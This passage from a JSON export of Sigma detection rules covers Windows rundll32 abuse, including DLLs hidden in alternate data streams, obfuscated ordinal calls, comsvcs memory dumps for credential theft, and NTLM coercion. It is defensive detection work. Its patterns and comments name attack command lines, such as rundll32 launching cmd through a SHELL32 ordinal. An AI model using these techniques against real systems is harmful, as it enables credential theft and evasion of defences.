    "content": "title: Potential Rundll32 Execution With DLL Stored In ADS\nid: 9248c7e1-2bf3-4661-a22c-600a8040b446\nstatus: test\ndescription: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Rundll32\nauthor: Harjot Singh, '@cyb3rjy0t'\ndate: 2023-01-21\nmodified: 2023-02-08\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        # Example:\n        #   rundll32 \"C:\\ads\\file.txt:ADSDLL.dll\",DllMain\n        # Note: This doesn't cover the use case where a full path for the DLL isn't used. As it requires a more expensive regex\n        CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml",
    "content": "title: Suspicious Advpack Call Via Rundll32.EXE\nid: a1473adb-5338-4a20-b4c3-126763e2d3d3\nstatus: test\ndescription: Detects execution of \"rundll32\" calling \"advpack.dll\" with potential obfuscated ordinal calls in order to leverage the \"RegisterOCX\" function\nreferences:\n    - https://twitter.com/Hexacorn/status/1224848930795552769\n    - http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - CommandLine|contains: 'rundll32'\n    selection_cli_dll:\n        CommandLine|contains: 'advpack'\n    selection_cli_ordinal:\n        - CommandLine|contains|all:\n              - '#+'\n              - '12'\n        - CommandLine|contains: '#-'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_inline_vbs.yml",
    "content": "title: Suspicious Rundll32 Invoking Inline VBScript\nid: 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd\nstatus: test\ndescription: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-05\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - 'Execute'\n            - 'RegRead'\n            - 'window.close'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml",
    "content": "title: Rundll32 InstallScreenSaver Execution\nid: 15bd98ea-55f4-4d37-b09a-e7caa0fa2221\nstatus: test\ndescription: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver\nreferences:\n    - https://lolbas-project.github.io/lolbas/Libraries/Desk/\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl\nauthor: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec'\ndate: 2022-04-28\nmodified: 2023-02-09\ntags:\n    - attack.t1218.011\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains: 'InstallScreenSaver'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate installation of a new screensaver\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_keymgr.yml",
    "content": "title: Suspicious Key Manager Access\nid: a4694263-59a8-4608-a3a0-6f8d3a51664c\nstatus: test\ndescription: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)\nreferences:\n    - https://twitter.com/NinjaParanoid/status/1516442028963659777\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-21\nmodified: 2023-02-09\ntags:\n    - attack.credential-access\n    - attack.t1555.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'keymgr'\n            - 'KRShowKeyMgr'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml",
    "content": "title: Mshtml.DLL RunHTMLApplication Suspicious Usage\nid: 4782eb5a-a513-4523-a0ac-f3082b26ac5c\nrelated:\n    - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3\n      type: obsolete\n    - id: 73fcad2e-ff14-4c38-b11d-4172c8ac86c7\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of commands that leverage the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)\nreferences:\n    - https://twitter.com/n1nj4sec/status/1421190238081277959\n    - https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt\n    - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt\nauthor: Nasreddine Bencherchali (Nextron Systems),  Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)\ndate: 2022-08-14\nmodified: 2024-02-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\..\\'\n            - 'mshtml'\n        CommandLine|contains:\n            - '#135'\n            - 'RunHTMLApplication'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml",
    "content": "title: Rundll32 Execution Without CommandLine Parameters\nid: 1775e15e-b61b-4d14-a1a3-80981298085a\nstatus: test\ndescription: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity\nreferences:\n    - https://www.cobaltstrike.com/help-opsec\n    - https://twitter.com/ber_m1ng/status/1397948048135778309\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-27\nmodified: 2023-08-31\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|endswith:\n            - '\\rundll32.exe'\n            - '\\rundll32.exe\"'\n            - '\\rundll32'\n    filter:\n        ParentImage|contains:\n            - '\\AppData\\Local\\'\n            - '\\Microsoft\\Edge\\'\n    condition: selection and not filter\nfalsepositives:\n    - Possible but rare\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml",
    "content": "title: Suspicious NTLM Authentication on the Printer Spooler Service\nid: bb76d96b-821c-47cf-944b-7ce377864492\nstatus: test\ndescription: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service\nreferences:\n    - https://twitter.com/med0x2e/status/1520402518685200384\n    - https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml\nauthor: Elastic (idea), Tobias Michalski (Nextron Systems)\ndate: 2022-05-04\nmodified: 2023-02-09\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1212\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'C:\\windows\\system32\\davclnt.dll,DavSetCookie'\n            - 'http'\n        CommandLine|contains:\n            - 'spoolss'\n            - 'srvsvc'\n            - '/print/pipe/'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml",
    "content": "title: Potential Obfuscated Ordinal Call Via Rundll32\nid: 43fa5350-db63-4b8f-9a01-789a427074e1\nstatus: test\ndescription: Detects execution of \"rundll32\" with potential obfuscated ordinal calls\nreferences:\n    - Internal Research\n    - https://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2023-05-17\nmodified: 2025-02-23\ntags:\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - CommandLine|contains: 'rundll32'\n    selection_cli:\n        CommandLine|contains:\n            - '#+'\n            - '#-'\n            # ordinal can be represented by adding any number of zeros in front ordinal number, for e.g. 000000024\n            - '#0'\n            # ordinal is 16 bit ordinal, so if you make the number large enough (don't fit in 16 bit space), then it normally wraps around.\n            # for e.g ordinal 24 can be also represented by 65560 (65536+24)\n            - '#655'\n            - '#656'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml",
    "content": "title: Rundll32 Spawned Via Explorer.EXE\nid: 1723e720-616d-4ddc-ab02-f7e3685a4713\nstatus: test\ndescription: Detects execution of \"rundll32.exe\" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: CD_ROM_\ndate: 2022-05-21\nmodified: 2023-08-31\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\explorer.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    filter_main_generic:\n        - CommandLine|contains: ' C:\\Windows\\System32\\' # The space at the start is required\n        - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' # Windows 10 volume control\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml",
    "content": "title: Process Memory Dump Via Comsvcs.DLL\nid: 646ea171-dded-4578-8a4d-65e9822892e3\nrelated:\n    - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c\n      type: obsolete\nstatus: test\ndescription: Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)\nreferences:\n    - https://twitter.com/shantanukhande/status/1229348874298388484\n    - https://twitter.com/pythonresponder/status/1385064506049630211?s=21\n    - https://twitter.com/Hexacorn/status/1224848930795552769\n    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/\n    - https://twitter.com/SBousseaden/status/1167417096374050817\n    - https://twitter.com/Wietze/status/1542107456507203586\n    - https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py\n    - https://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s\nauthor: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2020-02-18\nmodified: 2025-02-23\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1036\n    - attack.t1003.001\n    - car.2013-05-009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - CommandLine|contains: 'rundll32'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'comsvcs'\n            - 'full'\n        CommandLine|contains:\n            - '#-'\n            - '#+'\n            - '#24'\n            - '24 '\n            - 'MiniDump' # Matches MiniDump and MinidumpW\n            - '#65560' # ordinal is 16 bit ordinal, so if you make the number large enough (don't fit in 16 bit space), then it normally wraps around.  for e.g ordinal 24 can be also represented by 65560 (65536+24)\n    selection_generic:\n        CommandLine|contains|all:\n            - '24'\n            - 'comsvcs'\n            - 'full'\n        CommandLine|contains:\n            - ' #'\n            - ',#'\n            - ', #'\n            - '\"#'\n    condition: (selection_img and 1 of selection_cli_*) or selection_generic\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml",
    "content": "title: Rundll32 Registered COM Objects\nid: f1edd233-30b5-4823-9e6a-c4171b24d316\nstatus: test\ndescription: load malicious registered COM objects\nreferences:\n    - https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md\nauthor: frack113\ndate: 2022-02-13\nmodified: 2023-02-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - '-sta '\n            - '-localserver '\n        CommandLine|contains|all:\n            - '{'\n            - '}'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_run_locations.yml",
    "content": "title: Suspicious Process Start Locations\nid: 15b75071-74cc-47e0-b4c6-b43744a62a2b\nstatus: test\ndescription: Detects suspicious process run from unusual locations\nreferences:\n    - https://car.mitre.org/wiki/CAR-2013-05-002\nauthor: juju4, Jonhnathan Ribeiro, oscd.community\ndate: 2019-01-16\nmodified: 2022-01-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - car.2013-05-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|contains:\n              - ':\\RECYCLER\\'\n              - ':\\SystemVolumeInformation\\'\n        - Image|startswith:\n              - 'C:\\Windows\\Tasks\\'\n              - 'C:\\Windows\\debug\\'\n              - 'C:\\Windows\\fonts\\'\n              - 'C:\\Windows\\help\\'\n              - 'C:\\Windows\\drivers\\'\n              - 'C:\\Windows\\addins\\'\n              - 'C:\\Windows\\cursors\\'\n              - 'C:\\Windows\\system32\\tasks\\'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml",
    "content": "title: Suspicious Rundll32 Setupapi.dll Activity\nid: 285b85b1-a555-4095-8652-a8a4106af63f\nstatus: test\ndescription: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Libraries/Setupapi/\n    - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf\n    - https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf\n    - https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20\nauthor: Konstantin Grishchenko, oscd.community\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\runonce.exe'\n        ParentImage|endswith: '\\rundll32.exe'\n        ParentCommandLine|contains|all:\n            - 'setupapi.dll'\n            - 'InstallHinfSection'\n    condition: selection\nfalsepositives:\n    - Scripts and administrative tools that use INF files for driver installation with setupapi.dll\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml",
    "content": "title: Shell32 DLL Execution in Suspicious Directory\nid: 32b96012-7892-429e-b26c-ac2bf46066ff\nstatus: test\ndescription: Detects shell32.dll executing a DLL in a suspicious directory\nreferences:\n    - https://www.group-ib.com/resources/threat-research/red-curl-2.html\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-11-24\nmodified: 2023-02-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'shell32.dll'\n            - 'Control_RunDLL'\n        CommandLine|contains:\n            - '%AppData%'\n            - '%LocalAppData%'\n            - '%Temp%'\n            - '%tmp%'\n            - '\\AppData\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml",
    "content": "title: Potential ShellDispatch.DLL Functionality Abuse\nid: 82343930-652f-43f5-ab70-2ee9fdd6d5e9\nstatus: test\ndescription: Detects potential \"ShellDispatch.dll\" functionality abuse to execute arbitrary binaries via \"ShellExecute\"\nreferences:\n    - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-20\ntags:\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains: 'RunDll_ShellExecuteW'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_spawn_explorer.yml",
    "content": "title: RunDLL32 Spawning Explorer\nid: caa06de8-fdef-4c91-826a-7f9e163eef4b\nstatus: test\ndescription: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-november-2021/\nauthor: elhoim, CD_ROM_\ndate: 2022-04-27\nmodified: 2022-05-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\rundll32.exe'\n        Image|endswith: '\\explorer.exe'\n    filter:\n        ParentCommandLine|contains: '\\shell32.dll,Control_RunDLL'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml",
    "content": "title: Potentially Suspicious Rundll32 Activity\nid: e593cf51-88db-4ee1-b920-37e89012a3c9\nstatus: test\ndescription: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities\nreferences:\n    - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/\n    - https://twitter.com/Hexacorn/status/885258886428725250\n    - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52\n    - https://twitter.com/nas_bench/status/1433344116071583746 # dfshim.dll,ShOpenVerbShortcut\n    - https://twitter.com/eral4m/status/1479106975967240209 # scrobj.dll,GenerateTypeLib\n    - https://twitter.com/eral4m/status/1479080793003671557 # shimgvw.dll,ImageView_Fullscreen\nauthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2023-05-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n              - 'javascript:'\n              - '.RegisterXLL'\n        - CommandLine|contains|all:\n              - 'url.dll'\n              - 'OpenURL'\n        - CommandLine|contains|all:\n              - 'url.dll'\n              - 'OpenURLA'\n        - CommandLine|contains|all:\n              - 'url.dll'\n              - 'FileProtocolHandler'\n        - CommandLine|contains|all:\n              - 'zipfldr.dll'\n              - 'RouteTheCall'\n        - CommandLine|contains|all:\n              - 'shell32.dll'\n              - 'Control_RunDLL'\n        - CommandLine|contains|all:\n              - 'shell32.dll'\n              - 'ShellExec_RunDLL'\n        - CommandLine|contains|all:\n              - 'mshtml.dll'\n              - 'PrintHTML'\n        - CommandLine|contains|all:\n              - 'advpack.dll'\n              - 'LaunchINFSection'\n        - CommandLine|contains|all:\n              - 'advpack.dll'\n              - 'RegisterOCX'\n        - CommandLine|contains|all:\n              - 'ieadvpack.dll'\n              - 'LaunchINFSection'\n        - CommandLine|contains|all:\n              - 'ieadvpack.dll'\n              - 'RegisterOCX'\n        - CommandLine|contains|all:\n              - 'ieframe.dll'\n              - 'OpenURL'\n        - CommandLine|contains|all:\n              - 'shdocvw.dll'\n              - 'OpenURL'\n        - CommandLine|contains|all:\n              - 'syssetup.dll'\n              - 'SetupInfObjectInstallAction'\n        - CommandLine|contains|all:\n              - 'setupapi.dll'\n              - 'InstallHinfSection'\n        - CommandLine|contains|all:\n              - 'pcwutl.dll'\n              - 'LaunchApplication'\n        - CommandLine|contains|all:\n              - 'dfshim.dll'\n              - 'ShOpenVerbApplication'\n        - CommandLine|contains|all:\n              - 'dfshim.dll'\n              - 'ShOpenVerbShortcut'\n        - CommandLine|contains|all:\n              - 'scrobj.dll'\n              - 'GenerateTypeLib'\n              - 'http'\n        - CommandLine|contains|all:\n              - 'shimgvw.dll'\n              - 'ImageView_Fullscreen'\n              - 'http'\n        - CommandLine|contains|all:\n              - 'comsvcs.dll'\n              - 'MiniDump'\n    filter_main_screensaver:\n        CommandLine|contains: 'shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver'\n    filter_main_parent_cpl:  # Settings\n        ParentImage: 'C:\\Windows\\System32\\control.exe'\n        ParentCommandLine|contains: '.cpl'\n        CommandLine|contains|all:\n            - 'Shell32.dll'\n            - 'Control_RunDLL'\n            - '.cpl'\n    filter_main_startmenu:\n        ParentImage: 'C:\\Windows\\System32\\control.exe'\n        CommandLine|startswith: '\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\'\n        CommandLine|endswith: '.cpl\",'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml",
    "content": "title: Suspicious Control Panel DLL Load\nid: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819\nstatus: test\ndescription: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits\nreferences:\n    - https://twitter.com/rikvduijn/status/853251879320662017\n    - https://twitter.com/felixw3000/status/853354851128025088\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-04-15\nmodified: 2023-02-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\System32\\control.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    filter:\n        CommandLine|contains: 'Shell32.dll'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml",
    "content": "title: Suspicious Rundll32 Execution With Image Extension\nid: 4aa6040b-3f28-44e3-a769-9208e5feb5ec\nrelated:\n    - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e\n      type: similar\nstatus: test\ndescription: Detects the execution of Rundll32.exe with DLL files masquerading as image files\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: Hieu Tran\ndate: 2023-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '.bmp'\n            - '.cr2'\n            - '.eps'\n            - '.gif'\n            - '.ico'\n            - '.jpeg'\n            - '.jpg'\n            - '.nef'\n            - '.orf'\n            - '.png'\n            - '.raw'\n            - '.sr2'\n            - '.tif'\n            - '.tiff'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml",
    "content": "title: Suspicious Usage Of ShellExec_RunDLL\nid: d87bd452-6da1-456e-8155-7dc988157b7d\nrelated:\n    - id: 36c5146c-d127-4f85-8e21-01bf62355d5a\n      type: obsolete\n    - id: 8823e85d-31d8-473e-b7f4-92da070f0fc6\n      type: similar\nstatus: test\ndescription: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\n    - https://github.com/SigmaHQ/sigma/issues/1009\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-01\nmodified: 2022-12-30\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_openasrundll:\n        CommandLine|contains: 'ShellExec_RunDLL'\n    selection_suspcli:\n        CommandLine|contains:\n            # Note: The ordinal number may differ depending on the DLL version\n            - '\\Desktop\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - 'comspec'\n            - 'iex'\n            - 'Invoke-'\n            - 'msiexec'\n            - 'odbcconf'\n            - 'regsvr32'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_ordinal_execution.yml",
    "content": "title: Suspicious ShellExec_RunDLL Call Via Ordinal\nid: 8823e85d-31d8-473e-b7f4-92da070f0fc6\nrelated:\n    - id: d87bd452-6da1-456e-8155-7dc988157b7d\n      type: derived\nstatus: test\ndescription: |\n    Detects suspicious call to the \"ShellExec_RunDLL\" exported function of SHELL32.DLL through the ordinal number to launch other commands.\n    Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\n    - https://github.com/SigmaHQ/sigma/issues/1009\n    - https://strontic.github.io/xcyclopedia/library/shell32.dll-65DA072F25DE83D9F83653E3FEA3644D.html\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_img:\n        ParentCommandLine|contains: 'SHELL32.DLL'\n    selection_parent_ordinal:\n        ParentCommandLine|contains:\n            # Note: The ordinal number may differ depending on the DLL version\n            # Example: rundll32 SHELL32.DLL,#572 \"cmd.exe\" \"/c calc.exe\"\n            - '#568'\n            - '#570'\n            - '#572'\n            - '#576'\n    selection_susp_cli_parent:\n        # Note: Add additional binaries and suspicious paths to increase coverage\n        - ParentCommandLine|contains:\n              - 'comspec'\n              - 'iex'\n              - 'Invoke-'\n              - 'msiexec'\n              - 'odbcconf'\n              - 'regsvr32'\n        - ParentCommandLine|contains:\n              - '\\Desktop\\'\n              - '\\ProgramData\\'\n              - '\\Temp\\'\n              - '\\Users\\Public\\'\n    selection_susp_child_img:\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\msxsl.exe'\n            - '\\odbcconf.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    condition: all of selection_parent_* and 1 of selection_susp_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml",
